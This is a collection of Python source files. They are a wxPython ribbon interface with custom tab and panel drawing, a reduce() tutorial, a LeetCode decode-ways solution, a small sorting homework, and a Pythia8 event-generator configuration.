        self.facility = rb.RibbonButtonBar(facility_panel)
        self.facility.AddSimpleButton(ID_PLATFORM, 'Platform', ico.platforms_32x32.GetBitmap(), 'Add new platform')
        self.facility.AddSimpleButton(ID_PROCESSOR, 'Processor', ico.processor_32x32.GetBitmap(), 'Add new processor')
        self.facility.AddSimpleButton(ID_PIPELINE, 'Pipeline', ico.pipeline_32x32.GetBitmap(), 'Add new pipeline')

        concession_panel = rb.RibbonPanel(entities, wx.ID_ANY, 'Concession')
        self.concession = rb.RibbonButtonBar(concession_panel)
        self.concession.AddSimpleButton(ID_FIELD, 'Field', ico.field_32x32.GetBitmap(), 'Add new field')
        self.concession.AddSimpleButton(ID_BLOCK, 'Block', ico.block_32x32.GetBitmap(), 'Add new block')

        simulation_panel = rb.RibbonPanel(entities, wx.ID_ANY, 'Simulation')
        self.simulation = rb.RibbonButtonBar(simulation_panel)
        self.simulation.AddSimpleButton(ID_PROJECT, 'Project', ico.project_32x32.GetBitmap(), 'Add new project')
        self.simulation.AddSimpleButton(ID_HISTORY, 'History', ico.history_match_32x32.GetBitmap(), 'Add new history')
        self.simulation.AddSimpleButton(ID_SCENARIO, 'Scenario', ico.scenario_32x32.GetBitmap(), 'Add new scenario')
        self.simulation.AddSimpleButton(ID_PREDICTION, 'Prediction', ico.prediction_32x32.GetBitmap(), 'Add new prediction')

        self.ChangeArtProvider()
        self.Realize()

    # ==================================================================================================================
    # Events
    # ==================================================================================================================
    # comes from: https://github.com/wxWidgets/wxPython/blob/master/demo/agw/FlatMenu.py (26-08-2019)
    # lines: 538-561
    def OnFileTabMenu(self, event):
        """Pop up the 'File' menu just below the File tab button."""
        button = event.GetEventObject()
        button_size = button.GetSize()
        button_pos = button.GetPosition()
        # Convert to screen coordinates so the pop-up lands on the button.
        button_pos = button.GetParent().ClientToScreen(button_pos)

        self.file_menu.SetOwnerHeight(button_size.y)
        self.file_menu.Popup(wx.Point(button_pos.x, button_pos.y), self)

    # ==================================================================================================================
    # External Methods
    # ==================================================================================================================
    def EnableButtons(self, state, entity_mgr=None):
        """
        Enables or disables ribbon buttons. If state is False, all buttons are disabled, if state is True, the enabling
        is based on certain criteria from the entity_mgr w.r.t. lower hierarchy entities not being enabled if no
        higher level entity is available.
        :param state: bool
        :param entity_mgr: class EntityManager
        :return:
        """

        # Enable file menu
        self.file_menu.save.Enable(state)
        self.file_menu.save_as.Enable(state)
        self.file_menu.close.Enable(state)
        self.file_menu.settings.Enable(state)

        # Enable ribbon
        self.folder.EnableButton(ID_FOLDER, state)

        self.window.EnableButton(ID_WINDOW, state)
        self.window.EnableButton(ID_WINDOW_REFRESH, state)
        self.window.EnableButton(ID_WINDOW_PRESENT, state)

        self.generic_chart.EnableButton(ID_CHART_CARTESIAN, state)
        self.generic_chart.EnableButton(ID_CHART_STACKED, state)
        self.generic_chart.EnableButton(ID_CHART_BAR, state)
        self.generic_chart.EnableButton(ID_CHART_BUBBLE, state)
        self.generic_chart.EnableButton(ID_CHART_HISTOGRAM, state)
        self.generic_chart.EnableButton(ID_CHART_MAP, state)
        self.generic_chart.EnableButton(ID_CHART_3D, state)

        # TODO: Once charts are created, replace false with state
        self.custom_chart.EnableButton(ID_CHART_FIT, state)
        self.custom_chart.EnableButton(ID_CHART_TREND, False)
        self.custom_chart.EnableButton(ID_CHART_INCREMENT, False)
        self.custom_chart.EnableButton(ID_CHART_PROFILES, False)

        self.export.EnableButton(ID_EXPORT_EXCEL, state)

        self.correlation.EnableButton(ID_CORRELATION_ENT, state)
        self.correlation.EnableButton(ID_CORRELATION_VAR, state)

        self.summary.EnableButton(ID_SUMMARY, state)

        # Entities tab -------------------------------------------------------------------------------------------------
        # analogues and typecurves
        # Typecurves require at least one analogue to exist.
        self.portfolio.EnableButton(ID_ANALOGUE, state)
        self.portfolio.EnableButton(ID_SCALING, state)
        if state:
            if entity_mgr.GetAnalogues():
                self.portfolio.EnableButton(ID_TYPECURVE, state)
            else:
                self.portfolio.EnableButton(ID_TYPECURVE, False)
        else:
            self.portfolio.EnableButton(ID_TYPECURVE, state)

        # subsurface (reservoirs, themes, polygons, producers and injectors)
        # Hierarchy: reservoir -> theme -> polygon -> producer/injector; each
        # level is only enabled when its parent level has at least one entity.
        self.subsurface.EnableButton(ID_RESERVOIR, state)
        if state:
            if entity_mgr.GetReservoirs():
                self.subsurface.EnableButton(ID_THEME, state)
                if entity_mgr.GetThemes():
                    self.subsurface.EnableButton(ID_POLYGON, state)
                    if entity_mgr.GetPolygons():
                        self.subsurface.EnableButton(ID_PRODUCER, state)
                        self.subsurface.EnableButton(ID_INJECTOR, state)
                    else:
                        self.subsurface.EnableButton(ID_PRODUCER, False)
                        self.subsurface.EnableButton(ID_INJECTOR, False)
                else:
                    self.subsurface.EnableButton(ID_POLYGON, False)
            else:
                self.subsurface.EnableButton(ID_THEME, False)
        else:
            self.subsurface.EnableButton(ID_THEME, state)
            self.subsurface.EnableButton(ID_POLYGON, state)
            self.subsurface.EnableButton(ID_PRODUCER, state)
            self.subsurface.EnableButton(ID_INJECTOR, state)

        # facilities (platforms, processors and pipelines)
        # Processors require at least one platform to exist.
        self.facility.EnableButton(ID_PLATFORM, state)
        self.facility.EnableButton(ID_PIPELINE, state)
        if state:
            if entity_mgr.GetPlatforms():
                self.facility.EnableButton(ID_PROCESSOR, state)
            else:
                self.facility.EnableButton(ID_PROCESSOR, False)
        else:
            self.facility.EnableButton(ID_PROCESSOR, state)

        # concessions (fields and blocks)
        self.concession.EnableButton(ID_FIELD, state)
        self.concession.EnableButton(ID_BLOCK, state)

        # projects (projects, histories, scenarios and predictions)
        # Hierarchy: project -> history/scenario -> prediction.
        self.simulation.EnableButton(ID_PROJECT, state)
        if state:
            if entity_mgr.GetProjects():
                self.simulation.EnableButton(ID_HISTORY, state)
                self.simulation.EnableButton(ID_SCENARIO, state)
                if entity_mgr.GetScenarios():
                    self.simulation.EnableButton(ID_PREDICTION, state)
                else:
                    self.simulation.EnableButton(ID_PREDICTION, False)
            else:
                self.simulation.EnableButton(ID_HISTORY, False)
                self.simulation.EnableButton(ID_SCENARIO, False)
        else:
            self.simulation.EnableButton(ID_HISTORY, state)
            self.simulation.EnableButton(ID_SCENARIO, state)
            self.simulation.EnableButton(ID_PREDICTION, state)

    # Based on: https://github.com/wxWidgets/wxPython/blob/master/wx/lib/agw/ribbon/art_msw.py (16-07-2019)
    def ChangeArtProvider(self):
        """Re-skin the default MSW art provider: patch in the module-level
        drawing overrides and override its metrics and colour scheme."""
        art = self.GetArtProvider()

        # add changes to drawing methods (bound to the art provider instance)
        art.DrawTab = types.MethodType(DrawTab, art)
        art.DrawPanelBackground = types.MethodType(DrawPanelBackground, art)
        art.DrawPanelBorder = types.MethodType(DrawPanelBorder, art)
        art.DrawPageBackground = types.MethodType(DrawPageBackground, art)

        # ==============================================================================================================
        # drawing distances
        # ==============================================================================================================
        art._cached_tab_separator_visibility = -10.0  # valid visibilities are in range [0, 1]
        art._tab_separation_size = 0
        art._page_border_left = 1
        art._page_border_top = 0
        art._page_border_right = 0
        art._page_border_bottom = 2
        art._panel_x_separation_size = -1
        art._panel_y_separation_size = 0
        art._cached_tab_separator = wx.NullBitmap

        # ==============================================================================================================
        # colours
        # ==============================================================================================================
        # Tabs ---------------------------------------------------------------------------------------------------------
        # sets the colour of tab labels (created by Andrea Gavana
        # art._tab_label_colour = wx.Colour(255, 255, 255)

        # Adjusted by Frederik Lehn to allow for different colour of active tab, hovered tab and passive tab
        art._tab_label_colour = wx.Colour(255, 255, 255)
        art._tab_active_label_colour = wx.Colour(0, 0, 0)
        art._tab_hover_label_colour = wx.Colour(255, 255, 255)

        # dont know
        # art._tab_separator_colour = wx.Colour(255, 0, 0)
        # art._tab_separator_gradient_colour = wx.Colour(200, 0, 0)

        # sets the colour of the active tab
        art._tab_active_background_colour = wx.Colour(255, 255, 255)
        art._tab_active_background_gradient_colour = wx.Colour(230, 230, 230)

        # sets colour of the hovered tab
        art._tab_hover_background_top_colour = wx.Colour(100, 100, 100)
        art._tab_hover_background_top_gradient_colour = wx.Colour(105, 105, 105)
        art._tab_hover_background_colour = wx.Colour(105, 105, 105)
        art._tab_hover_background_gradient_colour = wx.Colour(110, 110, 110)

        # Sets the colour behind the tabs
        art._tab_ctrl_background_brush = wx.Brush(wx.Colour(55, 55, 55))

        # sets the colour of the border around the active tabs
        art._tab_border_pen = wx.Pen(wx.Colour(55, 55, 55))

        # Panels -------------------------------------------------------------------------------------------------------
        # sets the colour of the label of the panel
        art._panel_label_colour = wx.Colour(0, 0, 0)
        art._panel_hover_label_colour = wx.Colour(0, 0, 0)
        art._panel_minimised_label_colour = wx.Colour(0, 0, 0)

        # don't know
        # art._panel_active_background_colour = wx.Colour(255, 0, 0)  # aux.COLOUR_DEFAULT
        # art._panel_active_background_gradient_colour = wx.Colour(255, 0, 0)  # aux.COLOUR_DEFAULT
        # art._panel_active_background_top_colour = wx.Colour(255, 0, 0)  # aux.COLOUR_DEFAULT
        # art._panel_active_background_top_gradient_colour = wx.Colour(255, 0, 0)  # aux.COLOUR_DEFAULT

        # sets the colour of the background of the panel label
        art._panel_label_background_brush = wx.Brush(wx.Colour(230, 230, 230))
        art._panel_hover_label_background_brush = wx.Brush(wx.Colour(230, 230, 230))

        # dont' know
        # art._panel_hover_button_background_brush = wx.Brush(wx.Colour(255, 0, 0))

        # sets the colour of the border around the panel
        art._panel_border_pen = wx.Pen(wx.Colour(143, 143, 143))
        art._panel_border_gradient_pen = wx.Pen(wx.Colour(143, 143, 143))

        # Pages --------------------------------------------------------------------------------------------------------
        # Sets the colour of the tab pages
        art._page_background_top_colour = wx.Colour(230, 230, 230)
        art._page_background_top_gradient_colour = wx.Colour(242, 242, 242)
        art._page_background_colour = wx.Colour(242, 242, 242)
        art._page_background_gradient_colour = wx.Colour(255, 255, 255)

        # sets the colour of the background of the panels when hovering on them (not the pages)
        art._page_hover_background_top_colour = art._page_background_top_colour
        art._page_hover_background_top_gradient_colour = art._page_background_top_gradient_colour
        art._page_hover_background_colour = art._page_background_colour
        art._page_hover_background_gradient_colour = art._page_background_gradient_colour

        # sets the colour of the border around the pages,
        art._page_border_pen = wx.Pen(wx.Colour(83, 83, 83))

        # introduced by Frederik Lehn to allow for a different coloured top border
        art._page_border_top_pen = wx.Pen(wx.Colour(244, 170, 0))

        # Buttons ------------------------------------------------------------------------------------------------------
        # Sets the colour of the label of a button
        art._button_bar_label_colour = wx.Colour(0, 0, 0)

        # Sets the colour when clicking on a button
        art._button_bar_active_background_top_colour = wx.Colour(255, 218, 109)
        art._button_bar_active_background_top_gradient_colour = wx.Colour(255, 218, 109)
        art._button_bar_active_background_colour = wx.Colour(255, 218, 109)
        art._button_bar_active_background_gradient_colour = wx.Colour(255, 218, 109)

        # Sets the colour when hovering on a button
        art._button_bar_hover_background_top_colour = wx.Colour(255, 227, 125)
        art._button_bar_hover_background_top_gradient_colour = wx.Colour(254, 233, 157)
        art._button_bar_hover_background_colour = wx.Colour(254, 233, 157)
        art._button_bar_hover_background_gradient_colour = wx.Colour(253, 243, 204)

        # Sets the colour of the border when clicking and hovering on a button
        art._button_bar_active_border_pen = wx.Pen(wx.Colour(194, 150, 61))
        art._button_bar_hover_border_pen = wx.Pen(wx.Colour(242, 201, 88))

        self.SetArtProvider(art)
class RibbonFileMenu(CustomMenu):
    """Pop-up menu shown when the ribbon's 'File' tab button is clicked."""

    def __init__(self):
        super().__init__()

        # (attribute name, label, 32x32 bitmap) for every entry, in creation order.
        specs = (
            ('save', 'Save project', ico.save_32x32.GetBitmap()),
            ('save_as', 'Save project as', ico.save_as_32x32.GetBitmap()),
            ('open', 'Open project', ico.project_open_32x32.GetBitmap()),
            ('close', 'Close project', ico.project_close_32x32.GetBitmap()),
            ('new', 'New project', wx.ArtProvider.GetBitmap(wx.ART_NEW, wx.ART_OTHER, wx.Size(32, 32))),
            ('settings', 'Settings', ico.settings_32x32.GetBitmap()),
        )

        # Create each item and expose it as an attribute (self.save, self.open, ...)
        # so callers can enable/disable individual entries.
        for attr, label, bitmap in specs:
            item = CustomMenuItem(self, id=wx.ID_ANY, label=label, helpString='',
                                  kind=wx.ITEM_NORMAL, normalBmp=bitmap)
            setattr(self, attr, item)

        # Menu layout: file operations | project operations | settings.
        self.AppendItem(self.save)
        self.AppendItem(self.save_as)
        self.AppendSeparator()
        self.AppendItem(self.open)
        self.AppendItem(self.close)
        self.AppendItem(self.new)
        self.AppendSeparator()
        self.AppendItem(self.settings)
class RibbonFileTab(GradientButton):
    """Amber gradient button that acts as the ribbon's 'File' tab."""

    def __init__(self, parent):
        super().__init__(parent=parent, id=wx.ID_ANY, label='File', pos=(1, 2), size=(49, 24))

        # Square corners: swap in the zero-radius path builder.
        self.GetPath = types.MethodType(GetPathGradientButton, self)

        light = wx.Colour(236, 201, 10)
        mid = wx.Colour(250, 192, 0)
        dark = wx.Colour(244, 170, 0)

        # Idle state: light-to-dark vertical amber gradient.
        self.SetTopStartColour(light)
        self.SetTopEndColour(mid)
        self.SetBottomStartColour(mid)
        self.SetBottomEndColour(dark)

        # Pressed state: flat dark amber.
        self.SetPressedTopColour(dark)
        self.SetPressedBottomColour(dark)

        # Black label text.
        self.SetForegroundColour(wx.Colour(0, 0, 0))
# ======================================================================================================================
# Functions used to change the ArtProvider of the ribbon
# ======================================================================================================================
# Taken from https://github.com/wxWidgets/wxPython/blob/master/wx/lib/agw/ribbon/art_msw.py (17-07-2019)
# Changes are made to lines (in the link): 993-1007 in order to remove the curved edges at the bottom of the tabs
# Changes are made to lines (in the link): 982-991 in order to remove the curved edges at the top of the tabs
# Changes are made to lines (in the link): 1023 to have black colour for active tab and white for inactive
def DrawTab(self, dc, wnd, tab):
    """Replacement RibbonMSWArtProvider.DrawTab with square tab corners and
    custom active/hover colouring (bound onto the art provider instance).

    :param dc: device context to draw on.
    :param wnd: the ribbon bar window (unused here, kept for API compatibility).
    :param tab: tab info object with ``rect``, ``active``, ``hovered`` and ``page``.
    """
    if tab.rect.height <= 2:
        return

    if tab.active or tab.hovered:
        if tab.active:
            # Plain vertical gradient over the full (inset) tab rectangle.
            background = wx.Rect(*tab.rect)

            background.SetX(background.GetX() + 2)
            background.SetY(background.GetY() + 2)
            background.SetWidth(background.GetWidth() - 4)
            background.SetHeight(background.GetHeight() - 2)

            dc.GradientFillLinear(background, self._tab_active_background_colour,
                                  self._tab_active_background_gradient_colour, wx.SOUTH)

            # TODO: active and hovered

        elif tab.hovered:
            # Two stacked gradients: top half and bottom half of the tab.
            background = wx.Rect(*tab.rect)

            background.SetX(background.GetX() + 2)
            background.SetY(background.GetY() + 2)
            background.SetWidth(background.GetWidth() - 4)
            background.SetHeight(background.GetHeight() - 3)
            h = background.GetHeight()
            background.SetHeight(background.GetHeight() / 2)

            dc.GradientFillLinear(background, self._tab_hover_background_top_colour,
                                  self._tab_hover_background_top_gradient_colour, wx.SOUTH)

            background.SetY(background.GetY() + background.GetHeight())
            background.SetHeight(h - background.GetHeight())

            dc.GradientFillLinear(background, self._tab_hover_background_colour,
                                  self._tab_hover_background_gradient_colour, wx.SOUTH)

        # Draw the outline of the tab
        # NOTE(review): these fixed coordinates trace a tiny 2x2 square at the
        # top-left corner rather than the whole tab outline — presumably a
        # deliberate simplification of the original curved border; confirm.
        dc.SetPen(self._tab_border_pen)
        dc.DrawLine(wx.Point(1, 1), wx.Point(3, 1))
        dc.DrawLine(wx.Point(3, 1), wx.Point(3, 3))
        dc.DrawLine(wx.Point(3, 3), wx.Point(1, 3))
        dc.DrawLine(wx.Point(1, 3), wx.Point(1, 1))

    if self._flags & RIBBON_BAR_SHOW_PAGE_ICONS:
        icon = tab.page.GetIcon()

        if icon.IsOk():
            x = tab.rect.x + 4
            if self._flags & RIBBON_BAR_SHOW_PAGE_LABELS == 0:
                # No labels: centre the icon horizontally in the tab.
                x = tab.rect.x + (tab.rect.width - icon.GetWidth()) / 2

            dc.DrawBitmap(icon, x, tab.rect.y + 1 + (tab.rect.height - 1 - icon.GetHeight()) / 2, True)

    if self._flags & RIBBON_BAR_SHOW_PAGE_LABELS:
        label = tab.page.GetLabel()
        if label.strip():
            dc.SetFont(self._tab_label_font)
            # Label colour depends on the tab state (active is dark on light).
            if tab.active:
                dc.SetTextForeground(self._tab_active_label_colour)
            elif tab.hovered:
                dc.SetTextForeground(self._tab_hover_label_colour)
            else:
                dc.SetTextForeground(self._tab_label_colour)
            dc.SetBackgroundMode(wx.TRANSPARENT)

            text_width, text_height = dc.GetTextExtent(label)
            width = tab.rect.width - 5
            x = tab.rect.x + 3

            if self._flags & RIBBON_BAR_SHOW_PAGE_ICONS:
                # Shift the label to the right of the icon.
                x += 3 + tab.page.GetIcon().GetWidth()
                width -= 3 + tab.page.GetIcon().GetWidth()

            y = tab.rect.y + (tab.rect.height - text_height) / 2

            if width <= text_width:
                # Label wider than the tab: clip instead of centring.
                dc.SetClippingRegion(x, tab.rect.y, width, tab.rect.height)
                dc.DrawText(label, x, y)
            else:
                dc.DrawText(label, x + (width - text_width) / 2 + 1, y)
# Taken from https://github.com/wxWidgets/wxPython/blob/master/wx/lib/agw/ribbon/art_msw.py (16-07-2019)
# Changes are made to lines (in the link): 1691-1719 in order to remove wrap-around border of the panels
def DrawPanelBorder(self, dc, rect, primary_colour, secondary_colour):
    """Replacement RibbonMSWArtProvider.DrawPanelBorder: draws only a
    right-hand separator plus an accent-coloured top line (no wrap-around
    border).

    NOTE(review): despite their names, the callers pass wx.Pen objects for
    *primary_colour*/*secondary_colour* (see DrawPanelBackground);
    *secondary_colour* is unused here.
    """
    dc.SetPen(primary_colour)

    # draw the separating borders
    # Left border intentionally omitted so adjacent panels share one divider.
    #dc.DrawLine(wx.Point(1, 2), wx.Point(1, rect.height - 1))
    dc.DrawLine(wx.Point(rect.width, 2), wx.Point(rect.width, rect.height - 1))

    # draw the top border in the page top border colour
    dc.SetPen(self._page_border_top_pen)
    dc.DrawLine(wx.Point(0, 0), wx.Point(rect.width + 1, 0))
# Taken from https://github.com/wxWidgets/wxPython/blob/master/wx/lib/agw/ribbon/art_msw.py (18-07-2019)
# Changes are made to lines (in the link): 1450-1451 in order to extend panel colouring slightly to allow for a single border
# Changes are made to lines (in the link): 1480 due to an error with dc.DrawRectangleRect (changed to dc.DrawRectangle)
# notice this solution results in a slight flickering when moving the mouse between panels
def DrawPanelBackground(self, dc, wnd, rect):
    """Replacement RibbonMSWArtProvider.DrawPanelBackground: page-style fill,
    a bottom label strip with ellipsised text, the optional extension button,
    and the simplified panel border.

    :param dc: device context to draw on.
    :param wnd: the RibbonPanel being drawn.
    :param rect: full panel rectangle including padding.
    """
    self.DrawPartialPageBackground(dc, wnd, rect, False)

    true_rect = wx.Rect(*rect)
    true_rect = self.RemovePanelPadding(true_rect)

    dc.SetFont(self._panel_label_font)
    dc.SetPen(wx.TRANSPARENT_PEN)
    has_ext_button = wnd.HasExtButton()

    # Hover state selects the label strip colours.
    if wnd.IsHovered():
        dc.SetBrush(self._panel_hover_label_background_brush)
        dc.SetTextForeground(self._panel_hover_label_colour)
    else:
        dc.SetBrush(self._panel_label_background_brush)
        dc.SetTextForeground(self._panel_label_colour)

    label_rect = wx.Rect(*true_rect)
    label = wnd.GetLabel().strip()
    clip_label = False
    label_size = wx.Size(*dc.GetTextExtent(label))

    # The "+ 1" / "- 2" insets of the upstream implementation were removed
    # so the label strip spans the full panel width.
    label_rect.SetX(label_rect.GetX())  # + 1
    label_rect.SetWidth(label_rect.GetWidth())  # - 2
    label_rect.SetHeight(label_size.GetHeight() + 2)
    label_rect.SetY(true_rect.GetBottom() - label_rect.GetHeight())
    label_height = label_rect.GetHeight()

    # NOTE(review): label_bg_rect is assigned but never used below.
    label_bg_rect = wx.Rect(*label_rect)

    if has_ext_button:
        # Reserve room for the 13px extension button at the right edge.
        label_rect.SetWidth(label_rect.GetWidth() - 13)

    if label_size.GetWidth() > label_rect.GetWidth():
        # Test if there is enough length for 3 letters and ...
        new_label = label[0:3] + "..."
        label_size = wx.Size(*dc.GetTextExtent(new_label))

        if label_size.GetWidth() > label_rect.GetWidth():
            # Not enough room for three characters and ...
            # Display the entire label and just crop it
            clip_label = True
        else:
            # Room for some characters and ...
            # Display as many characters as possible and append ...
            for l in range(len(label) - 1, 3, -1):
                new_label = label[0:l] + "..."
                label_size = wx.Size(*dc.GetTextExtent(new_label))

                if label_size.GetWidth() <= label_rect.GetWidth():
                    label = new_label
                    break

    dc.DrawRectangle(label_rect)

    if clip_label:
        # DCClipper restricts drawing to the label strip until it goes out of scope.
        clip = wx.DCClipper(dc, label_rect)
        dc.DrawText(label, label_rect.GetX(), label_rect.GetY() + (label_rect.GetHeight() - label_size.GetHeight()) / 2)
    else:
        dc.DrawText(label, label_rect.GetX() + (label_rect.GetWidth() - label_size.GetWidth()) / 2,
                    label_rect.GetY() + (label_rect.GetHeight() - label_size.GetHeight()) / 2)

    if has_ext_button:
        if wnd.IsExtButtonHovered():
            dc.SetPen(self._panel_hover_button_border_pen)
            dc.SetBrush(self._panel_hover_button_background_brush)
            dc.DrawRoundedRectangle(label_rect.GetRight(), label_rect.GetBottom() - 13, 13, 13, 1)
            dc.DrawBitmap(self._panel_extension_bitmap[1], label_rect.GetRight() + 3, label_rect.GetBottom() - 10, True)
        else:
            dc.DrawBitmap(self._panel_extension_bitmap[0], label_rect.GetRight() + 3, label_rect.GetBottom() - 10, True)

    if wnd.IsHovered():
        # Repaint the client area (minus the label strip) in hover colours.
        client_rect = wx.Rect(*true_rect)
        client_rect.SetX(client_rect.GetX() + 1)
        client_rect.SetWidth(client_rect.GetWidth() - 2)
        client_rect.SetY(client_rect.GetY() + 1)
        client_rect.SetHeight( - 2 + label_height)
        self.DrawPartialPageBackground(dc, wnd, client_rect, True)

    self.DrawPanelBorder(dc, true_rect, self._panel_border_pen, self._panel_border_gradient_pen)
# Taken from https://github.com/wxWidgets/wxPython/blob/master/wx/lib/agw/ribbon/art_msw.py (17-07-2019)
# Changes are made to lines (in the link): 1229-1240 in order to remove rounded pages and allow for a coloured top line
def DrawPageBackground(self, dc, wnd, rect):
    """Replacement RibbonMSWArtProvider.DrawPageBackground: square page
    corners, a two-stage vertical gradient fill, a dark side/bottom border
    and an accent-coloured top line.

    :param dc: device context to draw on.
    :param wnd: the RibbonPage being drawn (unused, kept for API compatibility).
    :param rect: page rectangle.
    """
    dc.SetPen(wx.TRANSPARENT_PEN)
    dc.SetBrush(self._tab_ctrl_background_brush)

    # Fill the 2px left and right edges with the tab-bar background colour.
    edge = wx.Rect(*rect)

    edge.SetWidth(2)
    dc.DrawRectangle(edge.GetX(), edge.GetY(), edge.GetWidth(), edge.GetHeight())

    edge.SetX(edge.GetX() + rect.GetWidth() - 2)
    dc.DrawRectangle(edge.GetX(), edge.GetY(), edge.GetWidth(), edge.GetHeight())

    # Fill the 2px bottom edge likewise.
    edge = wx.Rect(*rect)
    edge.SetHeight(2)
    edge.SetY(edge.GetY() + rect.GetHeight() - edge.GetHeight())
    dc.DrawRectangle(edge.GetX(), edge.GetY(), edge.GetWidth(), edge.GetHeight())

    # Interior: top fifth gets one gradient, the remainder another.
    background = wx.Rect(*rect)
    background.SetX(background.GetX() + 2)
    background.SetWidth(background.GetWidth() - 4)
    background.SetHeight(background.GetHeight() - 2)

    background.SetHeight(background.GetHeight() / 5)
    dc.GradientFillLinear(background, self._page_background_top_colour,
                          self._page_background_top_gradient_colour, wx.SOUTH)

    background.SetY(background.GetY() + background.GetHeight())
    background.SetHeight(rect.GetHeight() - 2 - background.GetHeight())
    dc.GradientFillLinear(background, self._page_background_colour,
                          self._page_background_gradient_colour, wx.SOUTH)

    # draw bottom and the sides
    dc.SetPen(self._page_border_pen)

    border_points = [wx.Point() for i in range(4)]
    border_points[0] = wx.Point(0, 0)  # upper left
    border_points[1] = wx.Point(0, rect.height - 1)  # lower left
    border_points[2] = wx.Point(rect.width + 1, rect.height - 1)  # lower right
    border_points[3] = wx.Point(rect.width + 1, 0)  # upper right corner

    dc.DrawLines(border_points, rect.x, rect.y)

    # draw top line
    dc.SetPen(self._page_border_top_pen)
    dc.DrawLine(border_points[0], border_points[3])
# Taken from https://github.com/wxWidgets/wxPython/blob/master/wx/lib/agw/gradientbutton.py (17-07-2019)
# Changes are made to line (in the link): 476-489 in order to remove the rounding of the button (added zero radius)
def GetPathGradientButton(self, gc, rc, r):
    """Replacement GradientButton.GetPath that produces a square button shape.

    The incoming corner radius *r* is deliberately ignored: a zero radius
    removes the default rounded corners.
    """
    x, y, w, h = rc

    path = gc.CreatePath()
    path.AddRoundedRectangle(x, y, w, h, 0)
    path.CloseSubpath()

    return path
| [
"[email protected]"
] | |
4052771b1b4311c09a293921817f66b82411e14f | e095a91a3424ecc364c4532e8fc705b728a0d1b1 | /CodeWars/补充知识/reduce函数.py | cfbe488542ecf69f30da70eb19144d14b6799a9e | [] | no_license | Anakinliu/PythonProjects | caed257e71d2e52f691abc5095c4aca5c052feb2 | 2246794a88d06eaa381db1b3a72e9bc54a315dd7 | refs/heads/master | 2021-06-03T05:51:09.319613 | 2021-01-26T02:35:38 | 2021-01-26T02:35:38 | 101,546,309 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,005 | py | from functools import reduce
from itertools import groupby
def sum(a, b):
return a + b
def mul(a, b):
return a * b
def fuck(v, _):
print('v is: ', v)
v.append(0)
return v
lst = range(2)
# reduce函数参数: 函数名, 序列[,初始化序列]
print(reduce(sum, lst))
# 计算阶乘。。。
print(reduce(mul, range(1, 4)))
lst2 = [1, 3, 5, -1, 10, 0, 999, 100, -9, -12, -3, 1]
# 求最大值。。。
print(reduce(lambda a, b : a if a > b else b, lst2))
# print(reduce(fuck,lst, [1,2,3]))
#BEGIN 相当于
# it = iter(lst) # 生成迭代器,参数是支持迭代的对象
# value = [1,2,3]
# for i in it:
# value = fuck(value, i)
# print(value)
#END#
"""
第一步,选择序列的前两个元素并获得结果。
下一步是对先前获得的结果应用相同的功能,并且紧随第二个元素之后的数字将被再次存储。
继续此过程,直到容器中没有剩余元素为止。
返回的最终结果将返回并打印在控制台上。
"""
| [
"[email protected]"
] | |
4d13f16a6de050457f0c137b74e3f6643612f28d | 6b9b032a5516c8d7dbb26deeb1b189022f8f9411 | /LeetCode/dp/91.解码方法.py | c999d3a7c5e8a176bfe03eb5318fd70a5954222c | [] | no_license | mrmenand/Py_transaction | 84db99a0010ae90f43fba6b737d7035e48af55fb | 7e82422c84ad699805cc12568b8d3d969f66a419 | refs/heads/master | 2021-07-13T21:15:03.714689 | 2020-06-21T11:49:31 | 2020-06-21T11:49:31 | 176,281,954 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 392 | py | # 91. 解码方法
from functools import lru_cache
class Solution:
@lru_cache()
def numDecodings(self, s: str) -> int:
if not s:
return 1
res = 0
if len(s) >= 1 and s[0] != "0":
res += self.numDecodings(s[1:])
if len(s) >= 2 and s[0] != "0" and int(s[:2]) <= 26:
res += self.numDecodings(s[2:])
return res
| [
"[email protected]"
] | |
8be4be017c6af7fce4bd719c6b78a351b1b14568 | c9000e5e30825b29febbefa5ad00da1f57551f8e | /02/fandengyuan/homework.py | c6bce72ffa5f56803c26555e16520532b283fbab | [] | no_license | xiaotian1991/actual-10-homework | 81c58b24f58fc87e4890f1475ad83de8b66ee53b | 0b379ca6189f843f121df4db5814c83262f9981a | refs/heads/master | 2021-06-12T23:35:52.954510 | 2017-03-24T07:41:18 | 2017-03-24T07:41:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 268 | py | arr = [3,1,5,9,2,11,7]
arr0 = []
for i in range(len(arr)):
arr0.append(int(arr[i]))
m = len(arr0)-1
while m >= 1 and arr0[m] < arr0[m-1]:
arr0[m],arr0[m-1] = arr0[m-1],arr0[m]
m = m - 1
print arr0
| [
"[email protected]"
] | |
d7ea612d308d7b4f02c590f2d7d783457b7fee26 | 3b60e6f4bbc011003ac4929f01eb7409918deb79 | /Analysis_v1/Simulation/Pythia/genfragments/ADDGravToGG_NegInt-0_LambdaT-6500_M-4000To6500_TuneCUEP8M1_13TeV-pythia8_cfi.py | 8a74a89ef9ff1b0945512ccf71c71c4c03d5767a | [] | no_license | uzzielperez/Analyses | d1a64a4e8730325c94e2bc8461544837be8a179d | 1d66fa94763d7847011ea551ee872936c4c401be | refs/heads/master | 2023-02-09T04:54:01.854209 | 2020-09-07T14:57:54 | 2020-09-07T14:57:54 | 120,850,137 | 0 | 0 | null | 2020-06-17T16:48:16 | 2018-02-09T03:14:04 | C++ | UTF-8 | Python | false | false | 1,266 | py | import FWCore.ParameterSet.Config as cms
from Configuration.Generator.Pythia8CommonSettings_cfi import *
from Configuration.Generator.Pythia8CUEP8M1Settings_cfi import *
generator = cms.EDFilter("Pythia8GeneratorFilter",
maxEventsToPrint = cms.untracked.int32(1),
pythiaPylistVerbosity = cms.untracked.int32(1),
filterEfficiency = cms.untracked.double(1.0),
pythiaHepMCVerbosity = cms.untracked.bool(False),
comEnergy = cms.double(13000.),
PythiaParameters = cms.PSet(
pythia8CommonSettingsBlock,
pythia8CUEP8M1SettingsBlock,
processParameters = cms.vstring(
'ExtraDimensionsLED:LambdaT = 6500.0',
'ExtraDimensionsLED:n = 2',
'ExtraDimensionsLED:ffbar2gammagamma = on',
'ExtraDimensionsLED:gg2gammagamma = on',
'ExtraDimensionsLED:CutOffmode = 2',
'ExtraDimensionsLED:NegInt= 0',
'PhaseSpace:pTHatMin = 70.0',
'PhaseSpace:mHatMin = 6500.0',
'PhaseSpace:mHatMax = 4000.0'
),
parameterSets = cms.vstring('pythia8CommonSettings',
'pythia8CUEP8M1Settings',
'processParameters',
)
)
)
| [
"[email protected]"
] | |
